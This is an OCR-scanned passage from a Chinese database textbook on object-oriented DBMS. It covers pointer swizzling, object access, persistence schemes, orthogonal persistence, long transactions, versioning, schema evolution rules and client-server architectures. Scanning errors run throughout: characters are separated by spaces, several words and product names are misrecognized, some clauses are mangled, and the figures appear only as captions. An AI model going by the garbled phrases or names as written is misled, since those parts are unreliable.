缓存 的 传送 单元 是 页 ， 通 常 包含 了 许多 个 对 象 。 复 制 切换 可 能 效率 更 高 ， 因 为 在 最 坏 的 情况 
下 ， 只 有 被 修改 过 的 对 象 才 有 必要 切换 回 它们 的 OID ， 而 就 地 切换 技术 只 要 页 中 某 个 对 象 被 
修改 则 整个 页 的 所 有 对 象 都 必须 被 切换 回来 。 另 外 ， 对 于 复制 切换 的 方法 ， 每 一 个 对 象 都 必 
须 被 显 式 地 复制 到 局 部 对 象 缓冲 区 中 ， 然 而 这 就 要 求 缓冲 区 中 的 页 可 以 被 重用 。 
积极 切换 与 懒惰 切换 

Moss 和 Eliot ( 1990 ) 将 积极 切换 定义 为 : 在 任何 对 象 被 访问 之 前 ， 对 应 用 程序 使 用 
的 所 有 数据 页 中 的 所 有 持久 对 象 的 OID 进行 切换 。 这 是 比较 极端 的 做 法 ， 而 Kemper 和 
Kossman ( 1993 ) 则 提出 了 一 个 不 那么 严格 的 定义 ,切换 仅 限于 所 有 那些 应 用 程序 希望 访问 
对 象 的 持久 OID。 懒 惰 切 换 则 只 有 当 指 针 被 访问 或 者 被 发 现时 才 对 其 进行 切换 。 当 一 个 对 象 
被 失效 读 和 内存 时 ， 人 懒惰 切换 的 代价 较 低 ， 但 这 意味 着 在 访问 每 个 对 象 时 都 必须 处 理 两 种 不 
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同类 型 的 指针 : 已 切换 指针 和 未 切换 指针 。 
直接 切换 与 间接 切换 

只 有 当 切 换 指针 指向 的 对 象 可 能 已 经 不 在 虚 存 中 时 ， 直 接 切换 与 间接 切换 才 是 一 个 问 
题 。 对 于 直接 切换 ， 被 引用 对 象 的 虚 存 指针 直接 用 于 切换 指针 替换 ;对 于 间接 切换 ， 则 用 一 
个 中 间 对 象 替 换 虚 存 指针 ， 这 个 中 间 对 和 象 充当 了 实际 对 象 的 占 位 器 。 因 此 对 于 间接 模式 ， 对 
象 被 换 出 缓存 时 并 不 需要 将 指向 该 对 象 的 已 切换 指针 切换 回来 。 

这 些 技 术 可 以 组 合 出 八 种 可 能 (例如 ， 就 地 、 积 极 、 直 接 切换 ， 就 地 、 懒 懈 、 直 接 切 换 
或 者 复制 、 懒 惰 、 间 接 切换 )。 


27.3.2 ”访问 对 象 ， 


位 于 二 级 存储 器 上 的 对 象 是 如 何 被 访问 的 ， 这 是 另外 一 个 对 OODBMS 的 性 能 产生 很 大 
影响 的 因素 。 同 样 ， 如 果 和 仔细 研究 一 下 具有 两 级 存储 模式 的 传统 的 关系 DBMS 所 采用 的 方 
法 ， 就 可 以 发 现 图 27-7 所 示 的 步骤 是 很 典型 的 : 

e DBMS 利用 索引 或 者 表 扫 描 的 方法 确定 二 级 存储 器 哪些 页 包含 了 所 需 的 记录 (参见 

23.4 节 )。 之 后 ，DBMS 从 二 级 存储 器 中 读 取 该 页 ， 并 将 其 复制 到 缓存 。 

e 随后 ，DBMS 从 缓存 将 所 需 的 记录 传送 到 应 用 程序 的 内 存 空 间 。 若 有 必要 ， 还 要 将 
SQL 数据 类 型 转换 为 应 用 程序 的 数据 类 型 。 
然后 应 用 程序 就 可 以 在 自己 的 内 存 空间 更 新 记录 的 字段 。 

e 利用 SQL 语句 ， 应 用 程序 将 修改 过 的 字段 传送 到 DBMS 的 缓存 ， 同 样 ， 可 能 仍然 需 
要 数据 类 型 的 转换 。 
e 最 后 ， 在 合适 的 时 间 ，DBMS 将 修改 后 的 缓存 页 写 回 到 二 级 存储 器 。 





3. 访 问 对 象 











图 27-7 传统 的 DBMS 访问 一 个 记录 的 步骤 


132 第 七 部 分 对 脓 DBMS 


对 比 而 言 ， 对 于 单 级 存储 模型 ，OODBMS 使 用 下 列 步 又 从 二 级 存储 器 中 检索 对 象 ， 如 
图 27-8 所 示 : 

e OODBMS 使 用 所 需 对 象 的 OID 或 者 索引 确定 二 级 存储 器 中 哪些 页 包含 了 所 需 的 对 
象 。 然 后 ，OODBMS 从 二 级 存储 器 读 出 该 页 ， 并 将 其 复制 到 内 存 空 间 中 应 用 程序 的 
页 缓冲 区 中 。 

e 然后 ，OODBMS 要 进行 一 系列 的 转换 ， 例如: 

昌 切换 对 象 间 的 引用 (指针 )。 
甸 向 对 象 的 数据 结构 中 添加 某 些 信息 ， 使 其 符合 编程 语言 的 要 求 。 
四 对 于 来 自 不 同 硬件 平台 或 者 不 同 编程 语言 的 数据 ， 调 整 其 数据 表示 。 

e 然后 应 用 程序 就 可 以 根据 需要 直接 对 对 象 进行 访问 或 者 修改 。 

e 当 应 用 程序 希望 将 修改 持久 化 时 ,或 者 当 OODBMS 需要 将 页 换 出 页 缓冲 区 时 ,在 
将 页 写 回 二 级 存储 器 之 前 ，OODBMS 可 能 还 需要 进行 前 述 类 似 的 转换 。 
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图 27-8 ” OODBMS 访问 一 个 对 象 的 步骤 


27.3.3 ”持久 性 模式 


DBMS 必须 对 持久 对 象 存储 提供 支持 ， 持 久 对 象 是 指 在 用 户 会 话 或 者 创建 它们 的 应 用 程 
序 终止 后 仍然 存在 的 对 象 。 这 与 临时 对 象 相反 ， 临 时 对 象 只 在 程序 调用 的 时 候 存 在 。 持 久 对 
象 会 一 直 保留 到 不 再 需要 它们 时 才 会 被 删除 。 除 了 27.2.3 节 讨 论 的 租 入 式 语言 的 方法 以 外 ， 
下 面 介绍 的 模式 也 可 以 用 于 在 编程 语言 中 提供 持久 性 。 如 果 想 对 持久 模式 进行 全 面 的 研究 ， 
感 兴趣 的 读者 可 以 参考 Atkinson 和 Buneman ( 1989 ) 。 

虽然 直观 上 都 认为 持久 性 仅 限于 对 象 状态 ,但 实际 上 持久 性 也 能 作用 于 (对象) 代码 和 程 
序 的 执行 状态 。 将 代码 包含 在 持久 存储 中 隐 含 地 提供 了 一 种 更 加 完全 和 优美 的 解决 方案 。 然 而 ， 
由 于 缺乏 一 个 完全 集成 的 开发 环境 ， 并 且 因 为 代码 是 存在 于 文件 系统 中 的 ， 所 以 代码 的 持久 性 
就 导致 了 代码 的 重复 。 程 序 状态 和 线程 状态 的 持久 性 也 是 很 有 吸引 力 的， 但 是 不 同 于 那些 具有 
标准 定义 格式 的 代码 ， 程 序 执行 状态 不 容易 被 一 般 化 。 本 节 将 主要 讨论 对 象 持久 性 。 本 节 简 
要 介绍 在 OODBMS 中 实现 持久 性 的 三 种 方案 ， 分 别称 为 检查 点 、 串 化 和 显 式 页 调度 。 
检查 点 

某 些 系统 通过 将 程序 地 址 空间 的 全 部 或 部 分 复制 到 二 级 存储 器 来 实现 持久 性 。 在 整个 地 


常 27 竟 OODBMS 一 一 概念 与 恋 计 133 








址 空间 都 被 保存 的 情况 下 ， 程 序 能 够 从 检查 点 处 重新 启动 。 在 其 他 情况 下 ， 仅 程序 堆 中 的 内 
容 被 保存 下 来 。 

检查 点 技术 有 两 个 主要 的 缺点 : 最 典型 的 是 ， 一 个 检查 点 只 能 被 其 创建 程序 使 用 ; 第 二 
点 ,检查 点 可 能 会 包含 大 量 的 对 后 续 执 行 无 用 的 数据 。 

串 化 

某 些 系统 通过 将 数据 结构 的 闭 包 复制 到 磁盘 来 实现 持久 性 。 在 这 种 方案 中 ， 写 某 个 数 
据 值 通常 需 遍 历 从 该 值 可 达 的 所 有 对 和 象 构 成 的 图 ， 然 后 将 该 结构 的 扁平 版 本 写 和 磁盘。 从 
磁盘 读 回 这 个 扁平 数据 结构 时 就 产生 了 原 数据 结构 的 一 个 新 副本 。 该 过 程 有 时 被 称 为 串 化 
(serialization ) 或 漫 封 (pickling)， 在 分 布 式 计 算 环 境 中 ， 也 称 为 封 送 (marshaling ) 。 

串 化 有 两 个 固有 的 问题 。 首 先 ， 它 不 保存 对 象 标识 ， 因 此 如 果 两 个 共享 同一 个 公共 子 
结构 的 数据 分 别 被 串 化 ， 那 么 在 检索 的 时 候 ， 这 个 子 结构 在 两 个 新 的 副本 中 将 不 再 被 共享 。 
其 次 ， 串 化 并 不 是 增 量 式 的 ， 因 此 为 一 个 大 的 数据 结构 保存 小 的 变化 的 做 法 ， 其 效率 将 会 
很 低 。 

显 式 页 调度 
一 些 持 久 性 方案 允许 应 用 程序 员 在 应 用 程序 的 堆 和 持久 存储 之 间 显 式 地 “页 调度 ` 对 象 。 
如 前 所 述 ， 这 通常 需要 将 对 象 指针 从 基于 磁盘 的 模式 转换 到 基于 内 存 的 模式 。 对 于 显 式 页 调 
度 机 制 ， 有 两 种 一 般 性 的 方法 可 用 于 创建 /更 新 持久 对 象 : 基于 可 达 性 的 方法 和 基于 分 配 的 
廊 法 。 
基于 可 达 性 的 持久 性 意味 着 ， 如 果 一 个 对 象 是 从 持久 的 根 对 象 可 达 ， 则 该 对 象 是 持久 
的 。 这 种 方法 具有 一 些 优点 ， 例 如 ， 程 序 员 不 必 在 对 象 的 创建 时 间 就 决定 该 对 象 是 否 是 持久 
的 。 在 创建 后 的 任何 时 间 ， 都 可 以 通过 将 该 对 象 加 入 到 可 达 树 ( reachability tree)， 使 其 成 为 
持久 的 。 这 种 模型 能 够 很 好 地 映射 到 诸如 Smalltalk 或 Java 等 具有 某 种 形式 的 无 用 单元 回收 
机 制 的 语言 上 ， 该 机 制 发 现 某 个 对 象 从 其 他 任何 对 象 都 不 可 达 时 ， 自 动 删除 该 对 象 。 
基于 分 配 的 持久 性 意味 着 ， 一 个 对 象 只 有 在 应 用 程序 中 被 显 式 地 声明 为 持久 对 象 时 ， 该 
对 象 才 会 是 持久 的 。 可 以 通过 几 种 途径 实现 ， 例 如 : 
e 通过 类 。 一 个 类 被 静态 地 声明 为 持久 的 ， 则 其 所 有 的 实例 在 创建 时 即 被 持久 化 。 另 
外 ， 类 可 以 被 定义 为 系统 提供 的 某 个 持久 类 的 子 类 。Ontos 和 Objectivity/DB 就 是 采 
用 的 这 种 方法 。 

@ 通过 显 式 调用 。 可 以 在 创建 时 将 对 象 声 明 为 持久 的 ， 或 者 某 些 情况 下 在 运行 时 动态 
地 声明 。 这 是 ObjectStore 所 采用 的 方法 。 另 外 ， 对 象 可 被 动态 添加 到 持久 集合 中 。 

在 缺乏 普 适 的 无 用 单元 回收 机 制 时 ， 一 个 对 象 将 一 直 存 在 于 持久 存储 中 ， 直 到 它 被 应 用 
程序 显 式 地 删除 为 止 。 这 将 会 导致 存储 空间 泄漏 和 指针 悬挂 等 问题 。 

对 于 这 两 种 提供 持久 性 的 方法 ， 程 序 员 都 需要 处 理 两 种 不 同类 型 的 对 象 指 针 ， 这 将 降低 
软件 的 可 靠 性 和 可 维护 性 。 如 果 持 久 性 机 制 能 够 与 应 用 软件 的 编程 语言 完全 集成 ， 这 些 问题 
是 可 以 避免 的 ， 这 正 是 下 面 将 要 讨论 的 方法 。 


27.3.4 ” 正 交 持久 性 


在 编程 语言 中 提供 持久 性 的 机 制 之 一 是 正 交 持久 性 (orthogonal persistence) 〈( Atkinson 
等 人 ，1983; Cockshott，1983 )， 该 机 制 是 基于 下 面 的 三 个 基本 原则 的 : 
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持久 性 本 身 独 立 ”数据 对 象 的 持久 性 与 程序 处 理 该 数据 对 象 的 方式 无 关 ， 反之 ,程序 片 
段 在 表达 上 也 独立 于 它 所 处 理 数据 的 持久 性 。 例 如 ， 函 数 调用 时 既 可 以 使 用 具有 长 期 持久 性 
的 对 象 作为 参数 ， 有 时 也 可 以 使 用 临时 对 象 作为 参数 。 因 此 ， 程 序 员 不 需要 (实际 上 也 不 能 ) 
编程 控制 数据 在 长 期 存储 和 短期 存储 之 间 的 移动 。 

与 数据 类 型 正 交 所 有 的 数据 对 象 ， 不 管 其 类 型 是 什么 ， 都 应 该 允许 具有 全 范围 的 
持久 性 。 不 存在 不 允许 某 个 对 象 成 为 持久 对 象 或 者 临时 对 象 的 特殊 情况 。 在 某 些 持久 型 语 
言 中 ， 只 有 该 语言 数据 类 型 的 一 个 子 集 才 具有 持久 性 。 采 用 这 种 方法 的 语言 有 Pascal/R、 
Amber、Avalonr/C++ 和 卫 。 而 采用 这 种 正 交 方法 的 系统 包括 PS-algol、Napier88、Galileo 和 
GemStone (Connolly, 1997 )。 

可 传递 持久 性 ”在 语言 一 级 如 何 标识 和 支持 持久 对 象 与 该 语言 选择 了 哪些 数据 类 型 无 
关 。 当 前 广泛 使 用 的 标识 技术 是 上 节 所 述 的 基于 可 达 性 的 方法 。 该 原则 最 初 被 称 为 持久 性 标 
识 ， 但 这 里 更 推荐 使 用 的 ODMG 的 术语 “可 传递 持久 性 ”。 

正 交 持久 性 的 优点 和 缺点 

基于 正 交 持久 性 原则 ， 能 够 统一 处 理 系统 中 的 对 象 ， 这 对 于 程序 员 和 系统 来 说 都 很 
方便 : 

e 不 需要 使 用 单独 的 模式 语言 定义 长 期 数据 。 

e 不 需要 特殊 的 应 用 程序 代码 存 取 和 更 新 持久 数据 。 

e 对 于 可 作为 持久 数据 的 数据 结构 的 复杂 性 没有 限制 。 

因此 ， 正 交 持久 性 具有 下 列 优点 : 

e 通过 简化 语义 提高 了 程序 员 的 工作 效率 。 

。 提高 了 可 维护 性 一 一 持久 性 机 制 是 集中 式 的 ， 允 许 程 序 员 把 精力 集中 在 提供 业务 功 

能 上 。 

e 一 致 性 保护 机 制作 用 于 整个 环境 。 
支持 渐 增 式 演 化 。 

e 自动 的 引用 完整 性 。 

然而 ， 对 于 每 个 指针 引用 都 要 指向 一 个 持久 对 象 的 系统 来 说 ， 运 行 时 开销 是 比较 大 的 ， 
因为 系统 需要 检测 是 否 必须 从 二 级 存储 器 上 载 和 对象。 而 且 ， 尽 管 正 交 持久 性 提高 了 透明 
度 , 但 是 支持 并 发 进程 共享 的 系统 不 可 能 是 完全 透明 的 。 

尽管 正 交 持久 性 的 原理 很 好 ， 但 是 许多 OODBMS 却 并 没有 完全 实现 它 。 还 有 一 些 问题 
需要 慎重 考虑 ， 在 此 就 其 中 两 个 问题 做 个 简单 的 讨论 : 查询 和 事务 。 

查询 可 作用 于 何 种 对 象 ”从 传统 的 DBMS 角度 来 看 ， 说 明 性 的 查询 仅 涉 及 了 持久 对 象 ， 
也 就 是 存储 在 数据 库 中 的 对 象 。 然 而 ， 从 正 交 持久 性 的 观点 来 看 ， 我 们 应 该 一 视 同仁 地 对 待 
持久 对 象 和 临时 对 象 。 因 此 ， 查 询 应 该 同时 涉及 持久 对 象 和 临时 对 象 。 但 是 临时 对 象 的 范围 
是 什么 ? 这 个 范围 应 该 被 限定 在 当前 用 户 的 运行 单元 内 的 临时 对 象 ， 还 是 还 应 该 包括 其 他 并 
发 用 户 的 运行 单元 ? 无 论 哪 种 情况 ， 为 了 提高 效率 ， 我 们 都 可 能 希望 保存 临时 对 象 和 持久 对 
象 的 索引 。 那 么 ， 除 了 传统 服务 器 上 的 查询 处 理 外 ， 可 能 还 需要 在 客户 端 进行 某 种 形式 的 查 
询 处 理 。 

哪些 对 象 是 事务 语义 的 一 部 分 “从 传统 的 DBMS 角度 来 看 ， 事 务 的 ACID (原子 性 、 一 
致 性 、 隔 离 性 及 持久 性 ) 特性 仅 适 用 于 持久 对 象 (参见 22.1.1 节 )。 例 如 ， 当 事务 被 取消 时 ， 
任何 已 经 应 用 于 持久 对 象 的 更 新 都 应 该 被 撤销 。 然 而 从 正 交 持久 性 的 角度 来 看 ， 应 该 同等 对 
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待 持久 对 象 和 临时 对 象 。 因 此 ， 事 务 的 语义 是 否 也 同样 适用 于 临时 对 象 呢 ? 在 前 例 中 ， 当 撤 
销 对 持久 对 象 的 更 新 操作 时 ， 是 否 也 应 该 撤销 在 该 事务 的 作用 域 中 对 临时 对 象 所 进行 的 修 
改 ? 若 果真 如 此 ， 则 OODBMS 不 仅 需要 记录 对 持久 对 象 所 做 的 修改 ， 还 要 记录 对 临时 对 象 
所 做 的 修改 。 如 果 一 个 临时 对 象 在 事务 中 遭 到 了 破坏 ,那么 OODBMS 将 如 何在 用 户 的 运行 
单元 内 重建 该 临时 对 象 ” 如 果 事 务 语义 同时 涵盖 了 这 两 种 类 型 的 对 象 ， 那 么 就 会 有 大 量 的 问 
题 需要 解决 。 毫 不 奇怪 ， 很 少 有 OODBMS 保证 了 临时 对 象 的 事务 一 致 性 。 


27.4 OODBMS 中 的 问题 


在 9.2 节 曾 提 到 过 关系 DBMS 存在 的 三 个 问题 ， 即 

e 长 寿 事务 

e 版 本 

。 模式 演化 

本 节 将 讨论 在 OODBMS 中 如 何 解 决 这 些 问 题 。 此 外 ， 还 将 分 析 OODBMS 的 可 能 的 体 
系 结构 ， 并 简要 地 介绍 一 下 基准 测试 问题 。 


27.4.1 事务 


正如 22.1 节 所 讨论 的 ,事务 是 一 个 逻辑 工作 单元 ， 事务 总 是 将 数据 库 从 一 个 一 致 的 状 
态 转换 到 另 一 个 一 致 的 状态 。 在 商业 应 用 中 出 现 的 事务 类 型 一 般 都 是 持续 时 间 较 短 的 事务 。 
相反 ， 涉 及 复杂 对 象 的 事务 ， 例 如 出 现在 工程 和 设计 应 用 中 的 事务 ， 则 能 够 持续 几 个 小 时 ， 
甚至 几 天 。 显 然 ， 为 了 支持 持续 时 间 较 长 的 事务 ， 需 要 使 用 不 同 于 传统 数据 库 应 用 中 使 用 的 
协议 ， 因 为 出 现在 传统 数据 库 中 的 事务 通常 持续 时 间 都 比较 短 。 

在 OODBMS 中 ,并 发 控制 和 恢复 的 单元 逻辑 上 是 一 个 对 象 ， 尽 管 出 于 性 能 的 考虑 ， 可 
能 会 使 用 一 个 更 粗 的 粒度 。 基 于 锁 的 协议 是 OODBMS 最 普遍 使 用 的 一 种 防止 发 生 冲突 的 并 
发 控制 机 制 。 然 而 ， 对 于 启动 了 一 个 长 寿 事务 的 用 户 来 说 ， 最 不 能 接受 的 就 是 由 于 锁 冲 突 的 
缘故 被 迫 撤销 该 事务 ， 已 经 完成 的 工作 全 部 丢失 。 已 经 提出 的 两 种 解决 方案 是 : 

e 多 版 本 的 并 发 控制 协议 ， 在 22.2.6 节 已 经 讨论 过 。 

e 高 级 事务 模型 ， 例 如 内 套 事务 、saga 和 多 级 事务 ， 在 22.4 节 已 经 讨论 过 。 


27.4.2 版 本 


有 许多 应 用 需要 访问 对 象 以 前 的 状态 。 例 如 ， 一 项 设计 工作 的 开展 通常 是 一 种 实验 性 的 
和 渐 增 式 的 过 程 ， 其 涉及 的 范围 也 是 因 时 间 而 变化 的 。 因 此 ， 将 设计 内 容 存储 在 数据 库 中 ， 
以 追踪 设计 对 象 的 演化 过 程 以 及 不 同 的 事务 对 设计 所 进行 的 修改 是 很 有 必要 的 〈 例 如 ， 可 参 
见 Atwood，1985; Katz 等 人 ，1986; Banerjee 等 人 ，1987a) 。 

将 维护 对 象 演化 的 过 程 称 为 版 本 管理 。 一 个 对 象 版 本 代表 了 某 个 对 象 的 一 个 可 识别 的 状 
态 ， 版 本 历史 代表 了 对 象 的 演化 。 版 本 化 应 当 人 允许 这 样 管理 对 象 特性 的 变化 : 对 象 引用 总 是 
指向 对 象 的 那个 正确 的 版 本 。 图 27-9 举例 说 明了 三 个 对 象 的 版 本 管理 : OA，Oas 和 Oc。 例 
如 我 们 可 以 确定 ， 对 象 OA 包含 了 三 个 版 本 Vi、Vz、Vas ; VA 是 从 Vi 得 到 的 ; Vzs 和 Vza 是 
从 V: 得 到 的 。 图 中 还 给 出 了 一 个 对 象 配置 的 示例 ， 该 配置 包括 了 OA 的 Vs、Os 的 V2A 及 
Oc 的 Viso 
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图 27-9 版 本 与 配置 


商业 产品 Ontos、Versant、ObjectStore 、Objectivity/DB 和 Itasca 都 支持 某 种 形式 的 版 
本 管理 。Itasca 把 版 本 分 成 三 类 (Kim and Lochovsky，1989 ): 
@ 临时 版 本 。 临 时 版 本 被 认为 是 不 稳定 的 ， 可 被 更 改 和 删除 。 临 时 版 本 的 创建 既 可 以 
通过 从 公共 数据 库 检 出 一 个 发 布 版 本 ， 也 可 以 从 私有 数据 库 中 的 工作 版 本 或 者 临时 
版 本 导出 。 在 后 一 种 情况 下 ， 作 为 导出 基础 的 临时 版 本 随即 被 提升 为 工作 版 本 。 临 
时 版 本 被 存储 在 创建 者 的 私有 工作 空间 里 。 
e 工作 版 本 。 工 作 版 本 被 认为 是 稳定 的 ， 不 能 被 更 改 的 ， 但 是 可 被 其 创建 者 删除 。 工 
作 版 本 也 被 存储 在 创建 者 的 私有 工作 空间 里 。 
@ 发 布 版 本 。 发 布 版 本 被 认为 是 稳定 的 ， 不 能 被 更 改 和 删除 。 来 自私 有 数据 库 的 某 个 
工作 版 本 登记 注册 进入 公共 数据 库 后 就 成 为 了 发 布 版 本 。 
图 27-10 举例 说 明了 上 述 过 程 。 由 于 支持 版 本 带 来 了 性 能 和 空间 的 耗费 ，Itasca 要 求 应 
用 程序 指明 一 个 类 是 否 可 版 本 化 。 当 创建 一 个 可 版 本 化 的 类 的 实例 时 ， 除 了 创建 这 个 实例 的 
第 一 个 版 本 外 ， 还 要 创建 这 个 实例 的 一 个 类 属 对 象 (generic object)， 类 属 对 象 包含 了 版 本 管 
理 信息 。 





图 27-10 Itasca 中 的 版 本 类 型 


27.4.3 ”模式 演化 


设计 是 一 种 渐 增 式 过 程 ， 随 着 时 间 不 断 演化 。 为 了 支持 这 个 过 程 ， 应 用 程序 在 动态 地 定 
义 和 修改 数据 库 模式 方面 需要 有 很 大 的 灵活 性 。 例 如 ， 应 该 可 以 在 不 关闭 系统 的 情况 下 修改 
类 的 定义 、 继 承 结构 以 及 属性 和 方法 的 说 明 。 模 式 修改 与 上 面 讨 论 的 版 本 管理 关系 密切 。 模 
式 演 化 所 带 来 的 问题 是 很 复杂 的 ， 而 且 并 非 所 有 这 些 问题 都 已 经 被 足够 深入 地 探讨 过 。 通 
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常 ， 模 式 的 修改 包括 (Banerjee 等 人 ，1987b): 

1 ) 对 类 定义 的 修改 : 

(a) 修改 属性 。 

(b) 修改 方法 。 

2 ) 对 继承 层次 的 修改 : 

(a) 使 类 S 变 成 类 C 的 超 类 。 

(b) 将 类 S 从 类 C 的 超 类 列表 中 删除 。 

(c) 修改 类 C 的 超 类 的 次 序 。 

3 ) 对 类 集合 的 修改 ， 例 如 创建 和 删除 类 、 修 改 类 的 名 字 等 。 

对 于 模式 的 修改 一 定 不 能 使 模式 处 在 一 种 不 一 致 的 状态 。Itasca 和 GemStone 定义 了 关 
于 模式 一 致 性 的 规则 ， 称 为 模式 不 变 式 (schema invariant)， 当 模式 被 修改 时 ， 必 须 遵守 此 
规则 。 作 为 示例 ， 考 虑 图 27-11 所 示 的 模式 。 图 中 ， 继 承 来 的 属性 和 方法 是 用 和 矩形 表示 的 。 
例如 在 类 Staff 中 ， 属 性 name 和 DOB 以 及 方法 getAge 就 是 从 Person 中 继承 来 的 。 规 则 可 
以 被 分 成 四 个 组 ， 分 别 具 有 下 列 职责 : 

1 ) 解决 由 于 多 继承 和 在 子 类 中 对 属性 和 方法 的 重 定义 所 产生 的 冲突 。 

(a) 子 类 优先 于 超 类 的 规则 

如 果 一 个 类 的 属性 /方法 与 其 某 个 超 类 的 属性 /方法 重 名 ， 则 子 类 的 定义 优先 于 超 类 的 
定义 。 

(b) 不 同 来 源 的 超 类 之 间 的 优先 规则 

如 果 多 个 超 类 的 属性 /方法 具有 相同 的 名 字 ， 但 是 其 来 源 不 同 ， 则 子 类 继承 来 自 第 一 个 
超 类 的 属性 /方法 。 例 如 ， 考 虑 图 27-11 中 的 子 类 SalesStaffClient， 它 同时 继承 了 SalesStaff 
和 Client。 这 两 个 超 类 都 有 属性 teINo， 且 该 属性 不 是 从 同一 个 公共 超 类 中 继承 的 (在 本 
例 中 为 Person)。 在 这 个 示例 中 ，SalesStaffClient 中 telNo 的 定义 是 从 第 一 个 超 类 也 就 是 
SalesStaff 中 继承 的 。 

(c) 相同 来 源 的 超 类 之 间 的 优先 原则 

如 果 多 个 超 类 的 属性 /方法 具有 相同 的 名 字 ， 并 且 具 有 相同 的 来 源 ， 则 属性 /方法 只 会 
被 继承 一 次 。 如 果 属 性 的 域 在 某 个 超 类 中 被 重 定义 ， 则 具有 最 受 限 域 的 属性 将 被 子 类 继承 。 
如 果 域 和 域 无 法 比较 ， 则 子 类 继承 第 一 个 超 类 中 的 属性 。 例 如 ， 子 类 SalesStaffClient 同时 
从 SalesStaff 和 Client 处 继承 name 和 DOB。 可 是 ， 因 为 这 些 属性 本 身 都 是 从 Person 中 直接 
继承 来 的 ， 因 此 只 被 SalesStaffClient 继承 一 次 。 

2 ) 对 子 类 的 修改 的 传播 

(a) 修改 的 传播 规则 

超 类 中 对 类 的 属性 /方法 的 修改 结果 总 是 会 被 其 子 类 继承 的 ， 除 非 在 子 类 中 它们 又 
被 重新 定义 了 。 例 如 ， 如 果 从 Person 中 删除 方法 getAge， 则 这 个 改变 将 在 整个 模式 中 
Person 的 所 有 子 类 中 体现 出 来 。 注 意 ， 不 能 从 子 类 中 直接 删除 方法 getAge， 因 为 它 是 
被 超 类 Person 定义 的 。 再 举 一 例 ， 如 果 从 Staff 中 删除 方法 getMonthSalary， 则 这 个 变 
化 也 会 影响 到 Manager， 但 是 它 不 会 对 SalesStaff 造成 影响 ， 因 为 在 子 类 SalesStaff 中 ， 
该 方法 已 被 重新 定义 。 如 果 从 SalesStaff 中 删除 属性 teINo， 则 属性 telNo 的 这 个 版 本 也 
会 被 从 SalesStaffClient 中 删除 ， 但 是 SalesStaffClient 还 可 以 从 Client 中 继承 telNo ( 见 
上 面 1) 的 规则 (b))。 
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图 27-11 同时 具有 单 重 继承 和 多 重 继承 的 模式 示例 


(b) 在 冲突 情况 下 的 修改 的 传播 规则 
新 引入 的 属性 /方法 或 者 对 属性 /方法 名 字 的 修改 只 会 传播 到 那些 不 会 导致 名 字 冲 突 的 


子 类 中 。 


(c) 域 修改 的 规则 

属性 的 域 只 能 通过 泛 化 进行 修改 。 继 承 来 的 属性 的 域 不 能 比 超 类 中 源 属性 的 域 更 加 一 般 化 。 
3 ) 新 建 类 和 删除 类 与 其 他 类 之 间 的 继承 关系 的 聚集 与 删除 

(a) 插入 超 类 的 规则 

如 果 类 C 被 插入 到 类 Cs 的 超 类 列表 中 ，C 将 成 为 Cs 的 超 类 序列 中 的 最 后 一 个 。 任 何 可 
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能 出 现 的 继承 冲突 都 按照 ( 1 ) 中 规则 (a)、(b) 和 (c) 解决 

(b) 删除 超 类 的 规则 

如 果 类 C 只 有 一 个 超 类 Cs， 并 且 从 C 的 超 类 列表 中 删除 类 Cs， 则 C 成 为 超 类 Cs 的 所 
有 直接 超 类 的 直接 子 类 。C 的 新 超 类 的 次 序 与 Cs 的 超 类 的 次 序 相 同 。 例 如 ， 如 果 删 除 超 类 
Staff， 则 子 类 Manager 和 SalesStaff 将 成 为 Person 的 直接 子 类 。 

(c) 向 模式 中 插入 类 的 规则 

如 果 C 没有 指定 的 超 类 ， 则 C 就 成 为 OBJECT (整个 模式 的 根 ) 的 子 类 。 

(d) 从 模式 中 删除 类 的 规则 

要 从 模式 中 删除 类 C， 可 以 连续 地 使 用 3 ) 中 规则 (b) 将 C 从 其 所 有 子 类 的 超 类 列表 中 
删除 。OBJECT 不 能 被 删除 。 

4) 组 合 对 象 的 处 理 

第 四 组 规则 与 那些 支持 组 合 对 象 的 数据 模型 相关 。 这 个 组 只 有 一 个 基于 组 合 对象 的 不 同 
类 型 的 规则 。 在 此 省 略 了 规则 的 详细 内 容 ， 有 兴趣 的 读者 可 以 参阅 Banerjee 等 人 ( 1987b) 
和 Kim 等 人 (1989 )。 


27.4.4 体系 结构 


本 节 讨 论 两 个 体系 结构 方面 的 问题 : 如 何 最 好 地 将 客户 -服务 器 体系 结构 应 用 于 
OODBMS 环境 以 及 方法 的 存储 。 
客户 -服务 器 
为 了 在 分 布 式 环境 下 向 用 户 、 应 用 程序 和 工具 提供 所 需 数据 ， 许 多 商业 OODBMS 都 是 
采用 的 客户 - 服务 器 的 体系 结构 (参见 3.1 节 )。 然 而 并 不 是 所 有 的 系统 都 使 用 同样 的 客户 - 
服务 器 模型 。 根 据 客户 与 服务 器 功能 的 不 同 ， 可 以 把 客户 -服务 器 DBMS 的 体系 结构 分 为 
三 种 基本 类 型 (Loomis，1992 )， 如 图 27-12 所 示 : 
e@ 对 象 服务 器 。 这 种 方法 试图 将 处 理 任务 分 布 到 两 端 。 典 型 情况 下 ， 服 务 器 端 进 程 负 
责 管理 存储 、 加 锁 、 向 二 级 存储 器 提交 、 日 志和 恢复 、 实 施 安全 性 和 完整 性 、 查 询 
优化 和 执行 存储 过 程 。 客 户 端的 任务 是 事务 管理 以 及 提供 编程 语言 的 接口 。 这 是 在 
开放 、 分 布 的 环境 下 支持 协作 、 对 象 到 对 象 处 理 的 最 好 的 体系 结构 。 
e@ 页 服务 器 。 在 这 种 方法 中 ， 绝 大 多 数 的 数据 库 处 理 任务 都 是 在 客户 端 完 成 的 。 服 务 
器 端 负责 管 理 二 级 存储 器 和 向 客户 提供 所 请 求 的 页 。 
@ 数据 库 服务 器 。 在 这 种 方法 中 ， 绝 大 多 数 的 数据 库 处 理 任务 都 是 由 服务 器 端 完成 的 。 
客户 端 只 是 简单 地 将 请 求 传递 给 服务 器 、 接 收 结果 并 将 其 传递 给 应 用 程序 。 这 是 许 
多 关系 DBMS 所 采用 的 方法 。 
在 这 三 种 方法 中 ， 服 务 器 与 物理 数据 库 都 位 于 同一 台 机 器 上 ; 客户 端 则 既 可 位 于 同一 台 
机 器 上 ， 也 可 位 于 其 他 机 器 上 。 如 果 客 户 需 要 访问 分 布 在 多 台 机 器 上 的 数据 库 ， 则 客户 就 会 
与 每 台 机 器 上 的 服务 器 分 别 进行 通信 。 也 可 能 出 现 多 个 客户 与 一 个 服务 器 进行 通信 的 情况 ， 
例如 ， 每 个 用 户 或 者 每 个 应 用 程序 都 作为 一 个 客户 。 
方法 的 存储 与 执行 
